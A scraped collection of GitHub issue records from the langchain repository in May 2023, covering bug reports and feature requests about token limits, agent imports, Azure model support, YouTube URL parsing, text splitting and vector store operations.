### Expected behavior expected to get the result from openai llm with the allowed token limit. 
considering that the retriever is limited to 2k tokens and the rest of the tokens are for completion
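The `-7131` in the error looks like a completion budget computed as context window minus prompt tokens going negative. A sketch of the arithmetic (the 4097-token window for text-davinci-003 and the clamp are my assumptions, not LangChain's internals):

```python
def completion_budget(context_window: int, prompt_tokens: int, floor: int = 1) -> int:
    """Tokens left for the completion after the prompt is counted.
    Clamped so it can never go negative, which is what triggers
    "... is less than the minimum of 0 - 'max_tokens'"."""
    return max(floor, context_window - prompt_tokens)

# e.g. a 4097-token context with an 11228-token prompt would otherwise
# yield 4097 - 11228 = -7131, matching the value in the error above
print(completion_budget(4097, 11228))
print(completion_budget(4097, 2000))
```

In other words, the retriever's `max_tokens_limit` caps only the retrieved documents; if the rest of the prompt (history plus question) still exceeds the model's window, the derived `max_tokens` for the completion goes below zero.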
unable to set the max_tokens with ConversationalRetrievalChain
https://api.github.com/repos/langchain-ai/langchain/issues/4461/comments
1
2023-05-10T15:35:24Z
2023-09-15T16:14:03Z
https://github.com/langchain-ai/langchain/issues/4461
1,704,193,973
4,461
[ "langchain-ai", "langchain" ]
disregard. error in dataframe construction (needed dataframe.apply(pd.to_numeric, errors='coerce')) attempting to run code: pandas_agent = create_pandas_dataframe_agent(llm=llm, df=dataframe, verbose=True, max_iterations=4) output = pandas_agent.run(question_phrase) LOGGING main.py line 346 dataframe data: strike call_open_interest put_open_interest net_gamma_$_at_strike 0 90.0 0.0 -135.0 -16430.931 1 95.0 1.0 -154.0 -18621.7218 ... [dataframe lines omitted for brevity]... 48 157.5 0.0 0.0 0.0 49 160.0 307.0 -2.0 37121.733 50 0.0 0.0 0.0 0.0 > Entering new AgentExecutor chain... Thought: I need to find the sum of the call_open_interest column Action: python_repl_ast Action Input: df['call_open_interest'].sum() Observation: can only concatenate str (not "float") to str Thought: I need to convert the float to a string Action: python_repl_ast Action Input: str(df['call_open_interest'].sum()) Observation: can only concatenate str (not "float") to str Thought: I need to convert the float to a string Action: python_repl_ast Action Input: str(df['call_open_interest'].sum()) Observation: can only concatenate str (not "float") to str
Toolkits - Pandas Dataframe Agent python_repl_ast can't seem to convert float to string to concatenate output
https://api.github.com/repos/langchain-ai/langchain/issues/4460/comments
0
2023-05-10T15:31:03Z
2023-05-10T15:49:00Z
https://github.com/langchain-ai/langchain/issues/4460
1,704,187,744
4,460
[ "langchain-ai", "langchain" ]
### System Info llm = AzureChatOpenAI(deployment_name="JacobTextDavinci03", model_name="text-davinci-003", max_tokens=1500) File "C:\Users\jwei\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\openai\api_requestor.py", line 687, in _interpret_response_line raise self.handle_error_response( openai.error.InvalidRequestError: Resource not found It works well if I use the gpt-3.5-turbo model, so I'm guessing something is wrong with the openai library such that it can't support text-davinci-003? ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction It's quite easy to reproduce. Just follow the example here: https://python.langchain.com/en/latest/modules/models/llms/integrations/azure_openai_example.html It just won't work for any model other than gpt-3.5-turbo. ### Expected behavior It should support all kinds of Azure models.
AzureOpenAI can't support other model like text-davinci-003
https://api.github.com/repos/langchain-ai/langchain/issues/4453/comments
7
2023-05-10T12:13:05Z
2023-09-19T16:11:27Z
https://github.com/langchain-ai/langchain/issues/4453
1,703,792,846
4,453
[ "langchain-ai", "langchain" ]
### Feature request `YoutubeLoader.from_youtube_url` accepts only a single URL format. It should be able to handle at least the most common types of YouTube URLs out there. ### Motivation Current video id extraction is pretty naive. It doesn't handle anything other than a single specific type of YouTube URL. Any valid but different video address leads to an exception. ### Your contribution I've prepared a PR where I've introduced an `.extract_video_id` method. Under the hood it uses a regex to find the video id in the most popular YouTube URLs. The regex is based on the youtube-dl solution, which can be found here: https://github.com/ytdl-org/youtube-dl/blob/211cbfd5d46025a8e4d8f9f3d424aaada4698974/youtube_dl/extractor/youtube.py#L524
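For illustration, a much-reduced version of the idea (this simplified pattern is my own and covers only `watch?v=`, `youtu.be/`, and `/embed/` URLs — the PR uses the full youtube-dl expression):

```python
import re
from typing import Optional

# Simplified stand-in for the youtube-dl pattern: an 11-character video id
# preceded by one of the common URL shapes.
VIDEO_ID_RE = re.compile(r"(?:v=|youtu\.be/|/embed/)([0-9A-Za-z_-]{11})")

def extract_video_id(url: str) -> Optional[str]:
    """Return the video id for common YouTube URL forms, or None."""
    match = VIDEO_ID_RE.search(url)
    return match.group(1) if match else None

print(extract_video_id("https://www.youtube.com/watch?v=dQw4w9WgXcQ"))
print(extract_video_id("https://youtu.be/dQw4w9WgXcQ"))
print(extract_video_id("https://example.com/not-youtube"))
```

The payoff is that every loader entry point can normalize to a video id once, instead of baking one URL shape into `from_youtube_url`.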
YoutubeLoader.from_youtube_url should handle common YT url formats
https://api.github.com/repos/langchain-ai/langchain/issues/4451/comments
0
2023-05-10T11:09:22Z
2023-05-15T14:45:21Z
https://github.com/langchain-ai/langchain/issues/4451
1,703,681,221
4,451
[ "langchain-ai", "langchain" ]
### System Info Latest version of langchain. ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Why do I get an import error when I try to follow this example: https://python.langchain.com/en/latest/modules/agents/plan_and_execute.html ImportError: cannot import name 'PlanAndExecute' from 'langchain.agents' I have the latest langchain version 0.0.163 and tried to uninstall and reinstall, but the error remains. Thanks! ### Expected behavior Like in the documentation
Import error from official example (documentation)
https://api.github.com/repos/langchain-ai/langchain/issues/4448/comments
2
2023-05-10T10:34:18Z
2023-09-10T16:19:27Z
https://github.com/langchain-ai/langchain/issues/4448
1,703,613,599
4,448
[ "langchain-ai", "langchain" ]
### System Info Got this error with the official example from the documentation. ImportError: cannot import name 'PlanAndExecute' from 'langchain.agents' ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction from langchain.chat_models import ChatOpenAI from langchain.llms import OpenAI from langchain.agents import PlanAndExecute, load_agent_executor, load_chat_planner from langchain import SerpAPIWrapper from langchain.agents.tools import Tool from langchain import LLMMathChain search = SerpAPIWrapper() llm = OpenAI(temperature=0) llm_math_chain = LLMMathChain.from_llm(llm=llm, verbose=True) tools = [ Tool( name = "Search", func=search.run, description="useful for when you need to answer questions about current events" ), Tool( name="Calculator", func=llm_math_chain.run, description="useful for when you need to answer questions about math" ), ] model = ChatOpenAI(temperature=0) planner = load_chat_planner(model) executor = load_agent_executor(model, tools, verbose=True) agent.run("Who is Leo DiCaprio's girlfriend? What is her current age raised to the 0.43 power?")
steps=[Step(value="Search for Leo DiCaprio's girlfriend on the internet."), Step(value='Find her current age.'), Step(value='Raise her current age to the 0.43 power using a calculator or programming language.'), Step(value='Output the result.'), Step(value="Given the above steps taken, respond to the user's original question.\n\n")] > Entering new AgentExecutor chain... Action: ``` { "action": "Search", "action_input": "Who is Leo DiCaprio's girlfriend?" } ``` Observation: DiCaprio broke up with girlfriend Camila Morrone, 25, in the summer of 2022, after dating for four years. He's since been linked to another famous supermodel – Gigi Hadid. The power couple were first supposedly an item in September after being spotted getting cozy during a party at New York Fashion Week. Thought:Based on the previous observation, I can provide the answer to the current objective. Action: ``` { "action": "Final Answer", "action_input": "Leo DiCaprio is currently linked to Gigi Hadid." } ``` > Finished chain. ***** Step: Search for Leo DiCaprio's girlfriend on the internet. Response: Leo DiCaprio is currently linked to Gigi Hadid. > Entering new AgentExecutor chain... Action: ``` { "action": "Search", "action_input": "What is Gigi Hadid's current age?" } ``` Observation: 28 years Thought:Previous steps: steps=[(Step(value="Search for Leo DiCaprio's girlfriend on the internet."), StepResponse(response='Leo DiCaprio is currently linked to Gigi Hadid.'))] Current objective: value='Find her current age.' Action: ``` { "action": "Search", "action_input": "What is Gigi Hadid's current age?" } ``` Observation: 28 years Thought:Based on my search, Gigi Hadid's current age is 26 years old. Action: ``` { "action": "Final Answer", "action_input": "Gigi Hadid's current age is 26 years old." } ``` > Finished chain. ***** Step: Find her current age. Response: Gigi Hadid's current age is 26 years old. > Entering new AgentExecutor chain... 
Action: ``` { "action": "Calculator", "action_input": "26 ** 0.43" } ``` > Entering new LLMMathChain chain... 26 ** 0.43 ```text 26 ** 0.43 ``` ...numexpr.evaluate("26 ** 0.43")... Answer: 4.059182145592686 > Finished chain. Observation: Answer: 4.059182145592686 Thought:The current objective is to raise Gigi Hadid's age to the 0.43 power. Action: ``` { "action": "Calculator", "action_input": "26 ** 0.43" } ``` > Entering new LLMMathChain chain... 26 ** 0.43 ```text 26 ** 0.43 ``` ...numexpr.evaluate("26 ** 0.43")... Answer: 4.059182145592686 > Finished chain. Observation: Answer: 4.059182145592686 Thought:The answer to the current objective is 4.059182145592686. Action: ``` { "action": "Final Answer", "action_input": "Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years." } ``` > Finished chain. ***** Step: Raise her current age to the 0.43 power using a calculator or programming language. Response: Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years. > Entering new AgentExecutor chain... Action: ``` { "action": "Final Answer", "action_input": "Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years." } ``` > Finished chain. ***** Step: Output the result. Response: Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years. > Entering new AgentExecutor chain... Action: ``` { "action": "Final Answer", "action_input": "Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years." } ``` > Finished chain. ***** Step: Given the above steps taken, respond to the user's original question. Response: Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years. > Finished chain.
ImportError: cannot import name 'PlanAndExecute' from 'langchain.agents'
https://api.github.com/repos/langchain-ai/langchain/issues/4446/comments
3
2023-05-10T09:17:47Z
2023-09-15T16:14:13Z
https://github.com/langchain-ai/langchain/issues/4446
1,703,477,667
4,446
[ "langchain-ai", "langchain" ]
### System Info os : windows 11 I am trying to test the langchain selfretiever using chromadb and getting the below error. retriever = SelfQueryRetriever.from_llm(llm, vectorstore = vectordb, document_contents = document_content_description,metadata_field_info = metadata_field_info, verbose=True) I have also persisted vector store on disk and still facing the same error however the same code works on google colab.) **Error** ValueError: Self query retriever with Vector Store type not supported. ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [x] LLMs/Chat Models - [x] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [x] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction https://python.langchain.com/en/latest/modules/indexes/retrievers/examples/self_query_retriever.html ### Expected behavior ValueError: Self query retriever with Vector Store type not supported.
Langchain -self query retreiver using chromadb/faiss
https://api.github.com/repos/langchain-ai/langchain/issues/4441/comments
2
2023-05-10T06:56:08Z
2024-03-12T01:51:50Z
https://github.com/langchain-ai/langchain/issues/4441
1,703,245,543
4,441
[ "langchain-ai", "langchain" ]
### System Info Langchain: 0.0.162 Python: 3.10 Platform: Linux ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction You can ask a Generative Agent to respond, say, asking a question like "give me the lyrics of a song", then the multiline response is trivially truncated due to the below line https://github.com/hwchase17/langchain/blob/f0cfed636f37ea7c5171541e0df3f814858f1550/langchain/experimental/generative_agents/generative_agent.py#LL160C9-L160C52 ### Expected behavior do not truncate multiline response.
Splitting response in Generative Agents truncates the result too much
https://api.github.com/repos/langchain-ai/langchain/issues/4440/comments
4
2023-05-10T06:35:34Z
2023-12-04T16:08:14Z
https://github.com/langchain-ai/langchain/issues/4440
1,703,221,602
4,440
[ "langchain-ai", "langchain" ]
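The truncation reported above comes from keeping only the first line of the model's reply. A minimal sketch of a dialogue parser that preserves multiline responses is below; the `NAME said "..."` wrapper format is an assumption for illustration, not the actual prompt contract in `generative_agent.py`.

```python
import re

def parse_response(agent_name: str, raw: str) -> str:
    # Strip an optional '<NAME> said "..."' wrapper but keep every line
    # of the reply, instead of splitting on "\n" and keeping line one.
    text = raw.strip()
    match = re.match(rf'^{re.escape(agent_name)} said "(.*)"$', text, re.DOTALL)
    return match.group(1) if match else text

lyrics = 'Bob said "Verse one\nVerse two\nChorus"'
print(parse_response("Bob", lyrics))
```

With `re.DOTALL` the capture group spans newlines, so song lyrics and other multiline answers survive intact.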
### Issue you'd like to raise. We are unable to make multi input tools work consistently with conversational agent. Here is the scenario: User asks a question. Based on the question the agent needs to extract two inputs from the question and route it to the right tool for answer. If the user has not provided the two inputs, the agent needs to ask the user for those inputs, before using the tool. Finally it also needs to remember the inputs and not ask for those inputs again in subsequent messages from the user. I've tried various methods ranging from structured tool, structured agent, even regex matching, and nothing is producing consistent results. Could anyone please suggest any other ideas to solve this? Thank You! ### Suggestion: _No response_
Issue: Multi input tools do not work consistently with conversational agent
https://api.github.com/repos/langchain-ai/langchain/issues/4439/comments
3
2023-05-10T06:14:56Z
2023-10-23T16:08:43Z
https://github.com/langchain-ai/langchain/issues/4439
1,703,199,089
4,439
[ "langchain-ai", "langchain" ]
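Until multi-input parsing is reliable, one common workaround for the scenario above is to expose a single-input tool whose description tells the model to join both inputs with a delimiter, and to have the tool itself ask for whatever is missing. A sketch, in which the delimiter and the tool body are illustrative assumptions:

```python
def lookup_tool(query: str) -> str:
    # Hypothetical tool body: expects "city|date" in one string and
    # prompts for whatever is missing instead of failing.
    parts = [p.strip() for p in query.split("|")]
    if len(parts) != 2 or not all(parts):
        return "Please provide both a city and a date, separated by '|'."
    city, date = parts
    return f"Looking up results for {city} on {date}."

print(lookup_tool("Paris|2023-05-10"))
print(lookup_tool("Paris"))
```

The tool description would instruct the agent to format its Action Input as `city|date`; conversation memory then keeps the values across turns once supplied.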
### System Info langchainversion: 0.0.163 llama_index version: 0.6.4 PyTorch version: 2.0.0+cu118 Transformers version: 4.30.0.dev0 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [x] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Run: ```python from llama_index import LLMPredictor, PromptHelper, ServiceContext, SimpleDirectoryReader, GPTVectorStoreIndex, GPTListIndex model_id = 'google/flan-t5-large' tokenizer = AutoTokenizer.from_pretrained(model_id) model = AutoModelForSeq2SeqLM.from_pretrained(model_id) pipe = pipeline( "text2text-generation", model=model, tokenizer=tokenizer, max_length=512 ) local_llm_g_flan_t5_large = HuggingFacePipeline(pipeline=pipe) print(local_llm_g_flan_t5_large('What is the capital of Germany? ')) print(local_llm_g_flan_t5_large('What is the capital of Spain? ')) print(local_llm_g_flan_t5_large('What is the capital of Canada? 
')) # all is working untill here from llama_index import GPTListIndex, SimpleDirectoryReader, GPTVectorStoreIndex from langchain.embeddings import SentenceTransformerEmbeddings from llama_index import LangchainEmbedding, ServiceContext directory_path_ = '/content/dir' documents = SimpleDirectoryReader(directory_path_).load_data() llm_predictor = LLMPredictor(llm=local_llm_g_flan_t5_large) embed_model = SentenceTransformerEmbeddings(model_name="all-MiniLM-L6-v2") service_context = ServiceContext.from_defaults(embed_model=embed_model, llm_predictor=llm_predictor) index = GPTListIndex.from_documents(documents, service_context=service_context) ``` ``` --------------------------------------------------------------------------- AttributeError Traceback (most recent call last) <ipython-input-62-7d7e68b85aa2> in <cell line: 1>() ----> 1 index = GPTListIndex.from_documents(documents, service_context=service_context) 5 frames /usr/local/lib/python3.10/dist-packages/llama_index/token_counter/token_counter.py in wrapper_logic(_self) 48 49 start_token_ct = llm_predictor.total_tokens_used ---> 50 start_embed_token_ct = embed_model.total_tokens_used 51 52 yield AttributeError: 'HuggingFaceEmbeddings' object has no attribute 'total_tokens_used' ``` ### Expected behavior if try by using huggiface hub , it works fine but locally the same it does not work, my idea is to do context learning locally using this model
Run locally google flan t5 large issue with local embeddings
https://api.github.com/repos/langchain-ai/langchain/issues/4438/comments
2
2023-05-10T05:20:10Z
2023-10-31T16:07:30Z
https://github.com/langchain-ai/langchain/issues/4438
1,703,146,087
4,438
[ "langchain-ai", "langchain" ]
### System Info LangChain version : 0.0.158 Python version: 11 Mac OS Ventura 13.2.1 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I am using an agent to integrate with the "serpapi" tool. But, I also need to partially initialize a prompt to inform OpenAI on how to use the serpapi tool. For example, I want to set up the prompt with the current_date, before OpenAPI starts interacting with serp_api. To solve this problem, I am trying to use `llm_chain` as the parameter instead of an `llm` instance. But, currently the `initialize_agent` function only accepts an instance of `llm` and not the `llm_agent` tool. ``` def run_search_chain_serpapi(user_input, current_date=None): if not current_date: current_date = f"{datetime.datetime.now():%Y-%m-%d}" llm = OpenAI(temperature=0) prompt = PromptTemplate( input_variables=["input", "current_date"], template=_DEFAULT_SEARCH_PROMPT ) partial_prompt = prompt.partial(current_date="2023-05-09") llm_chain = LLMChain(llm=llm, prompt=partial_prompt) tools = load_tools([setup_serpi_tool()]) agent = initialize_agent(tools, llm_chain, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True) # Now let's test it out! 
result = agent(user_input) return result ``` I get the following error, while running this function: ``` ValidationError: 1 validation error for LLMChain llm Can't instantiate abstract class BaseLanguageModel with abstract methods agenerate_prompt, generate_prompt (type=type_error) ``` ### Expected behavior I believe given the LangChain is composable, the `agent` should be able to also accept an instance of `llm_chain` and not just plain `llm` instances.
Unable to provide llm_chain (instead of llm) to initialize_agent() while initializing the agent
https://api.github.com/repos/langchain-ai/langchain/issues/4437/comments
6
2023-05-10T04:32:01Z
2023-10-09T16:07:58Z
https://github.com/langchain-ai/langchain/issues/4437
1,703,106,397
4,437
[ "langchain-ai", "langchain" ]
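The underlying need in the issue above, pre-filling `current_date` before the agent runs, can also be met without handing an `LLMChain` to `initialize_agent`: format the template partially in plain Python and pass the resulting string where the agent expects a prompt. A stdlib stand-in for `PromptTemplate.partial()`:

```python
TEMPLATE = "Today is {current_date}. Use the search tool to answer: {input}"

def partial_format(template: str, **known) -> str:
    # Fill only the supplied placeholders; leave the rest intact.
    class Keep(dict):
        def __missing__(self, key):
            return "{" + key + "}"
    return template.format_map(Keep(**known))

prefilled = partial_format(TEMPLATE, current_date="2023-05-09")
print(prefilled)                  # "{input}" is still a placeholder
print(prefilled.format(input="What is in the news?"))
```

The partially filled string can then be supplied as the agent's prefix, leaving `{input}` for the agent machinery to fill at run time.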
### Feature request HuggingFace has a nice API for serving local LLMs in their [`text-generation`](https://github.com/huggingface/text-generation-inference) repo. I'd like to have a wrapper for this implemented in `langchain.llms`. **Resolves Issues** * [Feature Request Issue 4433](https://github.com/hwchase17/langchain/issues/4433) * [Feature Request Issue 4280](https://github.com/hwchase17/langchain/issues/4280) Usage would basically be something like: ```python # Both of these examples assume you already have a local LLM server # running. See the HuggingFace text-generation documentation for more # information on how to do this. from langchain.llms import HuggingFaceTextgen prompt = "What is Deep Learning?" host = "localhost" port = 8080 # Basic example (no streaming) llm = HuggingFaceTextgen(host=host, port=port) print(llm(prompt)) # Streaming response example from langchain.callbacks import streaming_stdout callbacks = [streaming_stdout.StreamingStdOutCallbackHandler()] llm = HuggingFaceTextgen( host=host, port=port, callbacks=callbacks, stream=True ) print(llm(prompt)) ``` ### Motivation There are a few existing HF LLM wrappers in langchain, but they seem to be more focused towards HF Hub use-cases. One of the biggest things the existing implementations lack (at least so far as I can tell), is they don't support streaming tokens back, which helps reduce _perceived latency_ for the user. ### Your contribution [Pull Request 4434](https://github.com/hwchase17/langchain/pull/4434) [See also PR 4447](https://github.com/hwchase17/langchain/pull/4447) - coincidentally implemented same feature at the same time - either one of these PRs should close the associated issues
Add LLM wrapper for HuggingFace text-generation local inference server
https://api.github.com/repos/langchain-ai/langchain/issues/4433/comments
1
2023-05-10T02:40:16Z
2023-05-13T16:12:28Z
https://github.com/langchain-ai/langchain/issues/4433
1,703,020,333
4,433
[ "langchain-ai", "langchain" ]
### Feature request The current version of CharacterTextSplitter does not provide support for a regular expression in the separator argument. ### Motivation Many documents can be split by slightly different patterns that can be handled by regular expression ### Your contribution -
Add support for regular expression in CharacterTextSplitter
https://api.github.com/repos/langchain-ai/langchain/issues/4429/comments
7
2023-05-10T00:08:27Z
2023-12-25T16:10:45Z
https://github.com/langchain-ai/langchain/issues/4429
1,702,904,262
4,429
[ "langchain-ai", "langchain" ]
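Until the splitter supports this natively, the requested behaviour can be approximated outside langchain with `re.split` plus a greedy merge back up to the chunk size. A rough sketch of what a regex-aware `CharacterTextSplitter` could do:

```python
import re

def regex_split(text: str, pattern: str, chunk_size: int = 100) -> list:
    # Split on a regex separator, then merge pieces up to chunk_size.
    pieces = [p for p in re.split(pattern, text) if p.strip()]
    chunks, current = [], ""
    for piece in pieces:
        if current and len(current) + len(piece) + 1 > chunk_size:
            chunks.append(current)
            current = piece
        else:
            current = f"{current} {piece}".strip()
    if current:
        chunks.append(current)
    return chunks

text = "First clause; second clause. Third one! Fourth one?"
print(regex_split(text, r"[;.!?]\s*", chunk_size=30))
```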
### Feature request I'd like to add more metadata, such as keywords, highlights, and questions to be answered, when building an embedding for a document, rather than only page_content. How can that be achieved today? ### Motivation Allow annotating the source document to get a better embedding, but without changing the document. ### Your contribution n/a
I wonder for embedding, we can allow passing other than page_content for embedding service
https://api.github.com/repos/langchain-ai/langchain/issues/4425/comments
4
2023-05-09T22:53:11Z
2023-09-15T16:14:18Z
https://github.com/langchain-ai/langchain/issues/4425
1,702,855,007
4,425
[ "langchain-ai", "langchain" ]
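Since only `page_content` is embedded today, one practical approach for the request above is to fold the annotations into the text handed to the embedding model while leaving the stored document untouched. A sketch in which the field names are illustrative:

```python
def enrich_for_embedding(page_content, keywords=None, questions=None):
    # Concatenate annotations with the text so they shape the vector,
    # without modifying the document that is stored and returned.
    parts = [page_content]
    if keywords:
        parts.append("Keywords: " + ", ".join(keywords))
    if questions:
        parts.append("Answers: " + " ".join(questions))
    return "\n".join(parts)

enriched = enrich_for_embedding(
    "LangChain composes LLM calls into chains.",
    keywords=["LLM", "chains"],
    questions=["What is LangChain?"],
)
print(enriched)
```

The enriched string goes to the embedding call, while the original page_content (with the annotations as metadata) is what gets stored and returned at query time.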
### Issue you'd like to raise. I want to do Q/A with the csv agent and multiple txt files at the same time. But I do not want to use the csv loader and txt loader, because they did not perform very well in cross-file scenarios. For example, the model needs to find answers from both the csv and txt files and then return the result. How should I do it? I think I may need to create a custom agent. ### Suggestion: _No response_
Do Q/A with csv agent and multiple txt files at the same time.
https://api.github.com/repos/langchain-ai/langchain/issues/4423/comments
7
2023-05-09T22:33:44Z
2023-05-26T17:54:10Z
https://github.com/langchain-ai/langchain/issues/4423
1,702,839,837
4,423
[ "langchain-ai", "langchain" ]
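One pattern for cross-file questions like the one above is to query each source separately and merge the evidence, rather than relying on a single loader. A toy sketch with stand-in retrievers; the real ones would wrap the csv agent and a text vector store:

```python
def answer_across_sources(question, retrievers):
    # Gather candidate snippets from every source, tagged by origin;
    # a final LLM step (here just concatenation) would combine them.
    snippets = []
    for name, retrieve in retrievers.items():
        for snippet in retrieve(question):
            snippets.append(f"[{name}] {snippet}")
    return "\n".join(snippets)

retrievers = {
    "csv": lambda q: ["row 42: revenue=1.2M"],
    "txt": lambda q: ["The 2022 report mentions revenue growth."],
}
print(answer_across_sources("What was revenue in 2022?", retrievers))
```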
### System Info Appears in LangChain 0.0.150 ### Who can help? @eyurtsev @vowelparrot ### Information - [x] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Document extraction (loading) from Confluence pages in versions up to 0.0.149 would return Markdown pages. In our app we then use MarkdownTextSplitter to split and embed. Starting with version 0.0.150, this behavior changed (Confluence beautifulsoup by @vowelparrot in #3576) and the documents extracted have lost their formatting. Formatting (especially combined with MarkdownTextSplitter) helped the model in understanding the context (text structure, tables, ...) and thus give better answers. ### Expected behavior Return Markdown pages as before, or alternatively provide a way to retrieve the documents either as Markdown (like up to version 0.0.149) or stripped (BeautifulSoup'ed). Markdown could be kept as an option, but it'd be nice not to remove it, as I believe it helps the model (text structure, tables, ...).
Regression: ConfluenceDataloader strips away Markdown formatting
https://api.github.com/repos/langchain-ai/langchain/issues/4407/comments
1
2023-05-09T15:34:06Z
2023-08-29T06:29:37Z
https://github.com/langchain-ai/langchain/issues/4407
1,702,282,488
4,407
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I had this code running smoothly before: llm=HuggingFaceHub(repo_id="google/flan-t5-xxl", model_kwargs={"temperature":0.7, "max_length":512}). But today, it says "HfHubHTTPError: 404 Client Error: Not Found for url: https://huggingface.co/api/models/google/flan-t5-xxl (Request ID: Root=1-645a5b93-4a130f591edbbc965dc50e6b) Sorry, we can't find the page you are looking for.". Any idea? ### Suggestion: _No response_
Issue: <Model google/flan-t5-xxl does not exist>
https://api.github.com/repos/langchain-ai/langchain/issues/4404/comments
2
2023-05-09T14:53:57Z
2023-09-10T16:19:43Z
https://github.com/langchain-ai/langchain/issues/4404
1,702,210,282
4,404
[ "langchain-ai", "langchain" ]
In Databricks I can't import langchain. `TypeError: dataclass_transform() got an unexpected keyword argument 'field_specifiers'` <img width="1266" alt="Capture d’écran 2023-05-09 à 16 18 05" src="https://github.com/hwchase17/langchain/assets/22887323/dad2700a-ad90-4d36-bb25-c5c00e6eb42f"> Thanks in advance.
ERROR-Import Langchain : TypeError: dataclass_transform() got an unexpected keyword argument 'field_specifiers'
https://api.github.com/repos/langchain-ai/langchain/issues/4401/comments
26
2023-05-09T14:25:59Z
2023-11-14T16:08:49Z
https://github.com/langchain-ai/langchain/issues/4401
1,702,155,760
4,401
[ "langchain-ai", "langchain" ]
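This error usually means the runtime ships an old `typing_extensions` whose `dataclass_transform` predates the `field_specifiers` argument that pydantic passes. A suggested fix, not verified on every Databricks runtime, is to upgrade it in the notebook environment:

```shell
pip install --upgrade typing-extensions pydantic
pip install --upgrade langchain
# Databricks notebooks may need a Python restart to pick up the new
# wheel, e.g. via dbutils.library.restartPython() on recent runtimes.
```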
### Feature request Currently, Weaviate vectorstore doesn't provide option for updation of vector embeddings on existing index and deletion of index. ### Motivation This feature request is related to an experiment project for which we need CRUD operations on Weaviate vectorstore. ### Your contribution I can provide my contribution if no one is currently working on this request.
[Feature Request] update and delete index operation on Weaviate vectorstore
https://api.github.com/repos/langchain-ai/langchain/issues/4399/comments
3
2023-05-09T14:10:15Z
2023-09-19T16:11:32Z
https://github.com/langchain-ai/langchain/issues/4399
1,702,126,607
4,399
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hey, we are trying to make use of a pandas dataframe agent. Most queries work quite well, but we can't get it working with time-span queries. If we ask the agent "what date is it?" the answer is correct. But if we ask "give me the revenue of the last week", the pandas query it generates is syntactically correct but the dates are completely off. Does anyone have an idea how to fix this? Thanks! ### Suggestion: _No response_
Agent not getting time spans correctly..
https://api.github.com/repos/langchain-ai/langchain/issues/4397/comments
3
2023-05-09T13:34:39Z
2023-09-15T16:14:28Z
https://github.com/langchain-ai/langchain/issues/4397
1,702,053,499
4,397
[ "langchain-ai", "langchain" ]
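The drift on relative ranges happens because the model has to guess what "last week" means. One mitigation is to resolve the span in plain Python first and put the concrete bounds into the question the agent receives:

```python
from datetime import date, timedelta

def last_week_range(today):
    # Monday..Sunday of the previous ISO week.
    start_of_this_week = today - timedelta(days=today.weekday())
    start = start_of_this_week - timedelta(days=7)
    return start, start + timedelta(days=6)

start, end = last_week_range(date(2023, 5, 9))
question = f"What is the total revenue between {start} and {end}?"
print(question)
```

With explicit dates in the prompt, the generated pandas filter no longer depends on the model's notion of the current date.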
